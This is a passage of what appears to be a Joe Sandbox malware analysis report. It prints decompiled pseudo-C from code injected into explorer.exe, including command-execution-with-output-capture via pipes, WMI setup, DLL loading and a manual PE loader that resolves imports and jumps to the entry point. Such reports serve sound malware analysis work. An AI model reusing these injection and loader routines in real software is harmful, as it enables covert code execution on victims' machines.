                  				_t15 =  &_v12;
                  				__imp__CoCreateInstance(0x9b848, 0, 1, 0x9b858, _t15);
                  				if(_t15 < 0) {
                  					L5:
                  					_t23 = _v8;
                  					if(_t23 != 0) {
                  						 *((intOrPtr*)( *_t23 + 8))(_t23);
                  					}
                  					_t24 = _v12;
                  					if(_t24 != 0) {
                  						 *((intOrPtr*)( *_t24 + 8))(_t24);
                  					}
                  					_t16 = 0;
                  				} else {
                  					__imp__#2(__ecx);
                  					_t25 = _v12;
                  					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                  					if(_t21 < 0) {
                  						goto L5;
                  					} else {
                  						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                  						if(_t21 < 0) {
                  							goto L5;
                  						} else {
                  							_t16 = E00088604(8);
                  							if(_t16 == 0) {
                  								goto L5;
                  							} else {
                  								 *((intOrPtr*)(_t16 + 4)) = _v12;
                  								 *_t16 = _v8;
                  							}
                  						}
                  					}
                  				}
                  				return _t16;
                  			}














                  APIs
                  • CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
                  • CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
                  • SysAllocString.OLEAUT32(00000000), ref: 0008D569
                  • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                  • String ID:
                  • API String ID: 1610782348-0
                  • Opcode ID: 61e718e46d9626c6fc607ac76e9c554d5449760960f597cd4dce1a0c96a4aa07
                  • Instruction ID: 5ca9e363416111ca0ccf9453dcb24a0453d396344b9ddfdbf921160754929c58
                  • Opcode Fuzzy Hash: 61e718e46d9626c6fc607ac76e9c554d5449760960f597cd4dce1a0c96a4aa07
                  • Instruction Fuzzy Hash: 6F21E970600245BBEB249B66DC4DE6FBFBCFFC6B25F10415EB541A62A0DA709A01CB30
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 79%
                  			E000921FF(char* __eax, char** _a4, long long* _a8) {
                  				char* _v8;
                  				long long _v16;
                  				char* _t9;
                  				signed char _t11;
                  				char** _t19;
                  				char _t22;
                  				long long _t32;
                  				long long _t33;
                  
                  				_t9 = __eax;
                  				L000922CD();
                  				_t19 = _a4;
                  				_t22 =  *__eax;
                  				if( *_t22 != 0x2e) {
                  					_t9 = strchr( *_t19, 0x2e);
                  					if(_t9 != 0) {
                  						 *_t9 =  *_t22;
                  					}
                  				}
                  				L00092291();
                  				 *_t9 =  *_t9 & 0x00000000;
                  				_t11 = strtod( *_t19,  &_v8);
                  				asm("fst qword [ebp-0xc]");
                  				_t32 =  *0x98250;
                  				asm("fucomp st1");
                  				asm("fnstsw ax");
                  				if((_t11 & 0x00000044) != 0) {
                  					L5:
                  					st0 = _t32;
                  					L00092291();
                  					if( *_t11 != 0x22) {
                  						_t33 = _v16;
                  						goto L8;
                  					} else {
                  						return _t11 | 0xffffffff;
                  					}
                  				} else {
                  					_t33 =  *0x98258;
                  					asm("fucomp st1");
                  					asm("fnstsw ax");
                  					if((_t11 & 0x00000044) != 0) {
                  						L8:
                  						 *_a8 = _t33;
                  						return 0;
                  					} else {
                  						goto L5;
                  					}
                  				}
                  			}












                  APIs
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: _errno$localeconvstrchrstrtod
                  • String ID:
                  • API String ID: 1035490122-0
                  • Opcode ID: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
                  • Instruction ID: 9be57ecffa989f7d2828815fae2d17a9d7f4e019258d81125002a8d3572c8328
                  • Opcode Fuzzy Hash: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
                  • Instruction Fuzzy Hash: 7701F239904205FADF127F24E9057DD7BA8AF4B360F2041D1E9D0A61E2DB759854E7A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 73%
                  			E0008A9B7(signed int __ecx) {
                  				void* _v8;
                  				void* _v12;
                  				void* _v16;
                  				void* _v20;
                  				signed int _v24;
                  				char _v28;
                  				char _v32;
                  				char _v36;
                  				struct _SECURITY_ATTRIBUTES _v48;
                  				intOrPtr _v60;
                  				char _v64;
                  				intOrPtr _v76;
                  				intOrPtr _v80;
                  				void* _v84;
                  				short _v92;
                  				intOrPtr _v96;
                  				void _v140;
                  				intOrPtr _t77;
                  				void* _t79;
                  				intOrPtr _t85;
                  				intOrPtr _t87;
                  				intOrPtr _t89;
                  				intOrPtr _t92;
                  				intOrPtr _t98;
                  				intOrPtr _t100;
                  				intOrPtr _t102;
                  				long _t111;
                  				intOrPtr _t115;
                  				intOrPtr _t126;
                  				void* _t127;
                  				void* _t128;
                  				void* _t129;
                  				void* _t130;
                  
                  				_t111 = 0;
                  				_v24 = __ecx;
                  				_v12 = 0;
                  				_v20 = 0;
                  				_t127 = 0;
                  				_v8 = 0;
                  				_v16 = 0;
                  				_v48.nLength = 0xc;
                  				_v48.lpSecurityDescriptor = 0;
                  				_v48.bInheritHandle = 1;
                  				_v28 = 0;
                  				memset( &_v140, 0, 0x44);
                  				asm("stosd");
                  				_t130 = _t129 + 0xc;
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
                  					L18:
                  					return 0;
                  				}
                  				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
                  					L13:
                  					E0008861A( &_v28, 0);
                  					if(_v20 != 0) {
                  						_t77 =  *0x9e684; // 0x40f8f0
                  						 *((intOrPtr*)(_t77 + 0x30))(_v20);
                  					}
                  					if(_v8 != 0) {
                  						_t115 =  *0x9e684; // 0x40f8f0
                  						 *((intOrPtr*)(_t115 + 0x30))(_v8);
                  					}
                  					return _t111;
                  				}
                  				_t79 = _v16;
                  				_v76 = _t79;
                  				_v80 = _t79;
                  				_v84 = _v12;
                  				_v140 = 0x44;
                  				_v96 = 0x101;
                  				_v92 = 0;
                  				_t126 = E00088604(0x1001);
                  				_v28 = _t126;
                  				if(_t126 == 0) {
                  					goto L18;
                  				}
                  				_push( &_v64);
                  				_push( &_v140);
                  				_t85 =  *0x9e684; // 0x40f8f0
                  				_push(0);
                  				_push(0);
                  				_push(0x8000000);
                  				_push(1);
                  				_push(0);
                  				_push(0);
                  				_push(_v24);
                  				_push(0);
                  				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
                  					goto L13;
                  				}
                  				_t87 =  *0x9e684; // 0x40f8f0
                  				 *((intOrPtr*)(_t87 + 0x30))(_v12);
                  				_t89 =  *0x9e684; // 0x40f8f0
                  				 *((intOrPtr*)(_t89 + 0x30))(_v16);
                  				_v24 = _v24 & 0;
                  				do {
                  					_t92 =  *0x9e684; // 0x40f8f0
                  					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
                  					 *((char*)(_v24 + _t126)) = 0;
                  					if(_t111 == 0) {
                  						_t127 = E000891A6(_t126, 0);
                  					} else {
                  						_push(0);
                  						_push(_t126);
                  						_v32 = _t127;
                  						_t127 = E00089292(_t127);
                  						E0008861A( &_v32, 0xffffffff);
                  						_t130 = _t130 + 0x14;
                  					}
                  					_t111 = _t127;
                  					_v32 = _t127;
                  				} while (_v36 != 0);
                  				_push( &_v36);
                  				_push(E0008C379(_t127));
                  				_t98 =  *0x9e68c; // 0x40fab8
                  				_push(_t127);
                  				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
                  					L12:
                  					_t100 =  *0x9e684; // 0x40f8f0
                  					 *((intOrPtr*)(_t100 + 0x30))(_v64);
                  					_t102 =  *0x9e684; // 0x40f8f0
                  					 *((intOrPtr*)(_t102 + 0x30))(_v60);
                  					goto L13;
                  				}
                  				_t128 = E00089256(_t127);
                  				if(_t128 == 0) {
                  					goto L12;
                  				}
                  				E0008861A( &_v32, 0);
                  				return _t128;
                  			}





































                  APIs
                  • memset.MSVCRT ref: 0008A9F4
                  • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 0008AA18
                  • CreatePipe.KERNEL32(000865A9,?,0000000C,00000000), ref: 0008AA2F
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                    • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateHeapPipe$AllocateFreememset
                  • String ID: D
                  • API String ID: 2365139273-2746444292
                  • Opcode ID: 3257b47c2173d9b5d448dffc2d1f1eb9bf365702ae8efab7a5ef50753d258819
                  • Instruction ID: 1038731307509bc63423b83b895d9a6edc7a8df2068bd220f00375d18a9fab8d
                  • Opcode Fuzzy Hash: 3257b47c2173d9b5d448dffc2d1f1eb9bf365702ae8efab7a5ef50753d258819
                  • Instruction Fuzzy Hash: 3A512C72E00209AFEB51EFA4CC45FDEBBB9BB08300F14416AF544E7152EB7499048B61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E0008C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
                  				char _v8;
                  				char _v12;
                  				void _v140;
                  				signed char _t14;
                  				char _t15;
                  				intOrPtr _t20;
                  				void* _t25;
                  				intOrPtr _t26;
                  				intOrPtr _t32;
                  				WCHAR* _t34;
                  				intOrPtr _t35;
                  				struct HINSTANCE__* _t37;
                  				int _t38;
                  				intOrPtr _t46;
                  				void* _t47;
                  				intOrPtr _t50;
                  				void* _t60;
                  				void* _t61;
                  				char _t62;
                  				char* _t63;
                  				void* _t65;
                  				intOrPtr _t66;
                  				char _t68;
                  
                  				_t65 = __esi;
                  				_t61 = __edi;
                  				_t47 = __ebx;
                  				_t50 =  *0x9e688; // 0xb0000
                  				_t14 =  *(_t50 + 0x1898);
                  				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
                  					_t15 = E000895E1(_t50, 0xb62);
                  					_t66 =  *0x9e688; // 0xb0000
                  					_t62 = _t15;
                  					_t67 = _t66 + 0xb0;
                  					_v8 = _t62;
                  					E00089640( &_v140, 0x40, L"%08x", E0008D400(_t66 + 0xb0, E0008C379(_t66 + 0xb0), 0));
                  					_t20 =  *0x9e688; // 0xb0000
                  					asm("sbb eax, eax");
                  					_t25 = E000895E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
                  					_t63 = "\\";
                  					_t26 =  *0x9e688; // 0xb0000
                  					_t68 = E000892E5(_t26 + 0x1020);
                  					_v12 = _t68;
                  					E000885D5( &_v8);
                  					_t32 =  *0x9e688; // 0xb0000
                  					_t34 = E000892E5(_t32 + 0x122a);
                  					 *0x9e784 = _t34;
                  					_t35 =  *0x9e684; // 0x40f8f0
                  					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
                  					_t37 = LoadLibraryW( *0x9e784);
                  					 *0x9e77c = _t37;
                  					if(_t37 == 0) {
                  						_t38 = 0;
                  					} else {
                  						_push(_t37);
                  						_t60 = 0x28;
                  						_t38 = E0008E171(0x9bb48, _t60);
                  					}
                  					 *0x9e780 = _t38;
                  					E0008861A( &_v12, 0xfffffffe);
                  					memset( &_v140, 0, 0x80);
                  					if( *0x9e780 != 0) {
                  						goto L10;
                  					} else {
                  						E0008861A(0x9e784, 0xfffffffe);
                  						goto L8;
                  					}
                  				} else {
                  					L8:
                  					if( *0x9e780 == 0) {
                  						_t46 =  *0x9e6bc; // 0x40fa18
                  						 *0x9e780 = _t46;
                  					}
                  					L10:
                  					return 1;
                  				}
                  			}



























                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: LibraryLoadmemset
                  • String ID: %08x$dll
                  • API String ID: 3406617148-2963171978
                  • Opcode ID: 948a104aa5df4c5dbcc384966bb2a77367822955b2633470f72edfc99a841e9d
                  • Instruction ID: f3dd22374d708548471efb5ddff1d4c344fbc2453a9af2a3a2ac9a4f9c61bf9a
                  • Opcode Fuzzy Hash: 948a104aa5df4c5dbcc384966bb2a77367822955b2633470f72edfc99a841e9d
                  • Instruction Fuzzy Hash: BB31B3B2A00244BBFB10FBA8EC89FAA73ACFB54354F544036F145D7192EB789D418725
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 99%
                  			E00092D70(int _a4, signed int _a8) {
                  				int _v8;
                  				intOrPtr _v12;
                  				signed int _v16;
                  				void* __esi;
                  				void* _t137;
                  				signed int _t141;
                  				intOrPtr* _t142;
                  				signed int _t145;
                  				signed int _t146;
                  				intOrPtr _t151;
                  				intOrPtr _t161;
                  				intOrPtr _t162;
                  				intOrPtr _t167;
                  				intOrPtr _t170;
                  				signed int _t172;
                  				intOrPtr _t173;
                  				int _t184;
                  				intOrPtr _t185;
                  				intOrPtr _t188;
                  				signed int _t189;
                  				void* _t195;
                  				int _t202;
                  				int _t208;
                  				intOrPtr _t217;
                  				signed int _t218;
                  				int _t219;
                  				intOrPtr _t220;
                  				signed int _t221;
                  				signed int _t222;
                  				int _t224;
                  				int _t225;
                  				signed int _t227;
                  				intOrPtr _t228;
                  				int _t232;
                  				int _t234;
                  				signed int _t235;
                  				int _t239;
                  				void* _t240;
                  				int _t245;
                  				int _t252;
                  				signed int _t253;
                  				int _t254;
                  				void* _t257;
                  				void* _t258;
                  				int _t259;
                  				intOrPtr _t260;
                  				int _t261;
                  				signed int _t269;
                  				signed int _t271;
                  				intOrPtr* _t272;
                  				void* _t273;
                  
                  				_t253 = _a8;
                  				_t272 = _a4;
                  				_t3 = _t272 + 0xc; // 0x452bf84d
                  				_t4 = _t272 + 0x2c; // 0x8df075ff
                  				_t228 =  *_t4;
                  				_t137 =  *_t3 + 0xfffffffb;
                  				_t229 =  <=  ? _t137 : _t228;
                  				_v16 =  <=  ? _t137 : _t228;
                  				_t269 = 0;
                  				_a4 =  *((intOrPtr*)( *_t272 + 4));
                  				asm("o16 nop [eax+eax]");
                  				while(1) {
                  					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
                  					_t141 =  *_t8 + 0x2a >> 3;
                  					_v12 = 0xffff;
                  					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                  					if(_t217 < _t141) {
                  						break;
                  					}
                  					_t11 = _t272 + 0x6c; // 0xa1ec8b55
                  					_t12 = _t272 + 0x5c; // 0x84e85000
                  					_t245 =  *_t11 -  *_t12;
                  					_v8 = _t245;
                  					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                  					_t247 =  <  ? _t195 : _v12;
                  					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                  					if(_t227 >= _v16) {
                  						L7:
                  						if(_t253 != 4) {
                  							L10:
                  							_t269 = 0;
                  							__eflags = 0;
                  						} else {
                  							_t285 = _t227 - _t195;
                  							if(_t227 != _t195) {
                  								goto L10;
                  							} else {
                  								_t269 = _t253 - 3;
                  							}
                  						}
                  						E00095D90(_t272, _t272, 0, 0, _t269);
                  						_t18 = _t272 + 0x14; // 0xc703f045
                  						_t19 = _t272 + 8; // 0x8d000040
                  						 *( *_t18 +  *_t19 - 4) = _t227;
                  						_t22 = _t272 + 0x14; // 0xc703f045
                  						_t23 = _t272 + 8; // 0x8d000040
                  						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                  						_t26 = _t272 + 0x14; // 0xc703f045
                  						_t27 = _t272 + 8; // 0x8d000040
                  						 *( *_t26 +  *_t27 - 2) =  !_t227;
                  						_t30 = _t272 + 0x14; // 0xc703f045
                  						_t31 = _t272 + 8; // 0x8d000040
                  						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                  						E00094AF0(_t285,  *_t272);
                  						_t202 = _v8;
                  						_t273 = _t273 + 0x14;
                  						if(_t202 != 0) {
                  							_t208 =  >  ? _t227 : _t202;
                  							_v8 = _t208;
                  							_t36 = _t272 + 0x38; // 0xf47d8bff
                  							_t37 = _t272 + 0x5c; // 0x84e85000
                  							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                  							_t273 = _t273 + 0xc;
                  							_t252 = _v8;
                  							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                  							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                  							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                  							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                  							_t227 = _t227 - _t252;
                  						}
                  						if(_t227 != 0) {
                  							E00094C30( *_t272,  *( *_t272 + 0xc), _t227);
                  							_t273 = _t273 + 0xc;
                  							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                  							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                  							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                  						}
                  						_t253 = _a8;
                  						if(_t269 == 0) {
                  							continue;
                  						}
                  					} else {
                  						if(_t227 != 0 || _t253 == 4) {
                  							if(_t253 != 0 && _t227 == _t195) {
                  								goto L7;
                  							}
                  						}
                  					}
                  					break;
                  				}
                  				_t142 =  *_t272;
                  				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                  				_a4 = _t232;
                  				if(_t232 == 0) {
                  					_t83 = _t272 + 0x6c; // 0xa1ec8b55
                  					_t254 =  *_t83;
                  				} else {
                  					_t59 = _t272 + 0x2c; // 0x8df075ff
                  					_t224 =  *_t59;
                  					if(_t232 < _t224) {
                  						_t65 = _t272 + 0x3c; // 0x830cc483
                  						_t66 = _t272 + 0x6c; // 0xa1ec8b55
                  						_t260 =  *_t66;
                  						__eflags =  *_t65 - _t260 - _t232;
                  						if( *_t65 - _t260 <= _t232) {
                  							_t67 = _t272 + 0x38; // 0xf47d8bff
                  							_t261 = _t260 - _t224;
                  							 *(_t272 + 0x6c) = _t261;
                  							memcpy( *_t67,  *_t67 + _t224, _t261);
                  							_t70 = _t272 + 0x16b0; // 0xdf750008
                  							_t188 =  *_t70;
                  							_t273 = _t273 + 0xc;
                  							_t232 = _a4;
                  							__eflags = _t188 - 2;
                  							if(_t188 < 2) {
                  								_t189 = _t188 + 1;
                  								__eflags = _t189;
                  								 *(_t272 + 0x16b0) = _t189;
                  							}
                  						}
                  						_t73 = _t272 + 0x38; // 0xf47d8bff
                  						_t74 = _t272 + 0x6c; // 0xa1ec8b55
                  						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
                  						_t225 = _a4;
                  						_t273 = _t273 + 0xc;
                  						_t76 = _t272 + 0x6c;
                  						 *_t76 =  *(_t272 + 0x6c) + _t225;
                  						__eflags =  *_t76;
                  						_t78 = _t272 + 0x6c; // 0xa1ec8b55
                  						_t184 =  *_t78;
                  						_t79 = _t272 + 0x2c; // 0x8df075ff
                  						_t239 =  *_t79;
                  					} else {
                  						 *(_t272 + 0x16b0) = 2;
                  						_t61 = _t272 + 0x38; // 0xf47d8bff
                  						memcpy( *_t61,  *_t142 - _t224, _t224);
                  						_t62 = _t272 + 0x2c; // 0x8df075ff
                  						_t184 =  *_t62;
                  						_t273 = _t273 + 0xc;
                  						_t225 = _a4;
                  						_t239 = _t184;
                  						 *(_t272 + 0x6c) = _t184;
                  					}
                  					_t254 = _t184;
                  					 *(_t272 + 0x5c) = _t184;
                  					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
                  					_t185 =  *_t81;
                  					_t240 = _t239 - _t185;
                  					_t241 =  <=  ? _t225 : _t240;
                  					_t242 = ( <=  ? _t225 : _t240) + _t185;
                  					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                  				}
                  				if( *(_t272 + 0x16c0) < _t254) {
                  					 *(_t272 + 0x16c0) = _t254;
                  				}
                  				if(_t269 == 0) {
                  					_t218 = _a8;
                  					__eflags = _t218;
                  					if(_t218 == 0) {
                  						L34:
                  						_t89 = _t272 + 0x3c; // 0x830cc483
                  						_t219 =  *_t272;
                  						_t145 =  *_t89 - _t254 - 1;
                  						_a4 =  *_t272;
                  						_t234 = _t254;
                  						_v16 = _t145;
                  						_v8 = _t254;
                  						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                  						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                  							_v8 = _t254;
                  							_t95 = _t272 + 0x5c; // 0x84e85000
                  							_a4 = _t219;
                  							_t234 = _t254;
                  							_t97 = _t272 + 0x2c; // 0x8df075ff
                  							__eflags =  *_t95 -  *_t97;
                  							if( *_t95 >=  *_t97) {
                  								_t98 = _t272 + 0x2c; // 0x8df075ff
                  								_t167 =  *_t98;
                  								_t259 = _t254 - _t167;
                  								_t99 = _t272 + 0x38; // 0xf47d8bff
                  								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                  								 *(_t272 + 0x6c) = _t259;
                  								memcpy( *_t99, _t167 +  *_t99, _t259);
                  								_t103 = _t272 + 0x16b0; // 0xdf750008
                  								_t170 =  *_t103;
                  								_t273 = _t273 + 0xc;
                  								__eflags = _t170 - 2;
                  								if(_t170 < 2) {
                  									_t172 = _t170 + 1;
                  									__eflags = _t172;
                  									 *(_t272 + 0x16b0) = _t172;
                  								}
                  								_t106 = _t272 + 0x2c; // 0x8df075ff
                  								_t145 = _v16 +  *_t106;
                  								__eflags = _t145;
                  								_a4 =  *_t272;
                  								_t108 = _t272 + 0x6c; // 0xa1ec8b55
                  								_t234 =  *_t108;
                  								_v8 = _t234;
                  							}
                  						}
                  						_t255 = _a4;
                  						_t220 =  *((intOrPtr*)(_a4 + 4));
                  						__eflags = _t145 - _t220;
                  						_t221 =  <=  ? _t145 : _t220;
                  						_t146 = _t221;
                  						_a4 = _t221;
                  						_t222 = _a8;
                  						__eflags = _t146;
                  						if(_t146 != 0) {
                  							_t114 = _t272 + 0x38; // 0xf47d8bff
                  							E00094C30(_t255,  *_t114 + _v8, _t146);
                  							_t273 = _t273 + 0xc;
                  							_t117 = _t272 + 0x6c;
                  							 *_t117 =  *(_t272 + 0x6c) + _a4;
                  							__eflags =  *_t117;
                  							_t119 = _t272 + 0x6c; // 0xa1ec8b55
                  							_t234 =  *_t119;
                  						}
                  						__eflags =  *(_t272 + 0x16c0) - _t234;
                  						if( *(_t272 + 0x16c0) < _t234) {
                  							 *(_t272 + 0x16c0) = _t234;
                  						}
                  						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
                  						_t123 = _t272 + 0xc; // 0x452bf84d
                  						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                  						__eflags = _t257 - 0xffff;
                  						_t258 =  >  ? 0xffff : _t257;
                  						_t124 = _t272 + 0x2c; // 0x8df075ff
                  						_t151 =  *_t124;
                  						_t125 = _t272 + 0x5c; // 0x84e85000
                  						_t235 = _t234 -  *_t125;
                  						__eflags = _t258 - _t151;
                  						_t152 =  <=  ? _t258 : _t151;
                  						__eflags = _t235 - ( <=  ? _t258 : _t151);
                  						if(_t235 >= ( <=  ? _t258 : _t151)) {
                  							L49:
                  							__eflags = _t235 - _t258;
                  							_t154 =  >  ? _t258 : _t235;
                  							_a4 =  >  ? _t258 : _t235;
                  							__eflags = _t222 - 4;
                  							if(_t222 != 4) {
                  								L53:
                  								_t269 = 0;
                  								__eflags = 0;
                  							} else {
                  								_t161 =  *_t272;
                  								__eflags =  *(_t161 + 4);
                  								_t154 = _a4;
                  								if( *(_t161 + 4) != 0) {
                  									goto L53;
                  								} else {
                  									__eflags = _t154 - _t235;
                  									if(_t154 != _t235) {
                  										goto L53;
                  									} else {
                  										_t269 = _t222 - 3;
                  									}
                  								}
                  							}
                  							_t131 = _t272 + 0x38; // 0xf47d8bff
                  							_t132 = _t272 + 0x5c; // 0x84e85000
                  							E00095D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                  							_t134 = _t272 + 0x5c;
                  							 *_t134 =  *(_t272 + 0x5c) + _a4;
                  							__eflags =  *_t134;
                  							E00094AF0( *_t134,  *_t272);
                  						} else {
                  							__eflags = _t235;
                  							if(_t235 != 0) {
                  								L46:
                  								__eflags = _t222;
                  								if(_t222 != 0) {
                  									_t162 =  *_t272;
                  									__eflags =  *(_t162 + 4);
                  									if( *(_t162 + 4) == 0) {
                  										__eflags = _t235 - _t258;
                  										if(_t235 <= _t258) {
                  											goto L49;
                  										}
                  									}
                  								}
                  							} else {
                  								__eflags = _t222 - 4;
                  								if(_t222 == 4) {
                  									goto L46;
                  								}
                  							}
                  						}
                  						asm("sbb edi, edi");
                  						_t271 =  ~_t269 & 0x00000002;
                  						__eflags = _t271;
                  						return _t271;
                  					} else {
                  						__eflags = _t218 - 4;
                  						if(_t218 == 4) {
                  							goto L34;
                  						} else {
                  							_t173 =  *_t272;
                  							__eflags =  *(_t173 + 4);
                  							if( *(_t173 + 4) != 0) {
                  								goto L34;
                  							} else {
                  								_t88 = _t272 + 0x5c; // 0x84e85000
                  								__eflags = _t254 -  *_t88;
                  								if(_t254 !=  *_t88) {
                  									goto L34;
                  								} else {
                  									return 1;
                  								}
                  							}
                  						}
                  					}
                  				} else {
                  					return 3;
                  				}
                  			}

                  APIs
                  Memory Dump Source
                  • Source File: 00000011.00000002.869763574.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID:
                  • API String ID: 3510742995-0
                  • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                  • Instruction ID: 185e7931b200b5f00758bf730992471f6333a59919987fd71983e5a0ce0181f8
                  • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                  • Instruction Fuzzy Hash: 74D11271A00B049FCB68CF69D8D4AAAB7F1FF88304B24892DE88AC7741D771E9449B54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 52%
                  			E00092AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                  				signed int _v5;
                  				signed short _v12;
                  				intOrPtr* _v16;
                  				signed int* _v20;
                  				intOrPtr _v24;
                  				unsigned int _v28;
                  				signed short* _v32;
                  				struct HINSTANCE__* _v36;
                  				intOrPtr* _v40;
                  				signed short* _v44;
                  				intOrPtr _v48;
                  				unsigned int _v52;
                  				intOrPtr _v56;
                  				_Unknown_base(*)()* _v60;
                  				signed int _v64;
                  				intOrPtr _v68;
                  				intOrPtr _v72;
                  				unsigned int _v76;
                  				intOrPtr _v80;
                  				signed int _v84;
                  				intOrPtr _v88;
                  				signed int _t149;
                  				void* _t189;
                  				signed int _t194;
                  				signed int _t196;
                  				intOrPtr _t236;
                  
                  				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                  				_v24 = _v72;
                  				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
                  				_v56 = _t236;
                  				if(_t236 == 0) {
                  					L13:
                  					while(0 != 0) {
                  					}
                  					_push(8);
                  					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
                  						L35:
                  						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
                  						while(0 != 0) {
                  						}
                  						if(_a12 != 0) {
                  							 *_a12 = _v68;
                  						}
                  						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
                  						return _v68(_a4, 1, _a8);
                  					}
                  					_v84 = 0x80000000;
                  					_t149 = 8;
                  					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
                  					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                  						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                  						if(_v36 == 0) {
                  							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                  						}
                  						if(_v36 != 0) {
                  							if( *_v16 == 0) {
                  								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                  							} else {
                  								_v20 =  *_v16 + _a4;
                  							}
                  							_v64 = _v64 & 0x00000000;
                  							while( *_v20 != 0) {
                  								if(( *_v20 & _v84) == 0) {
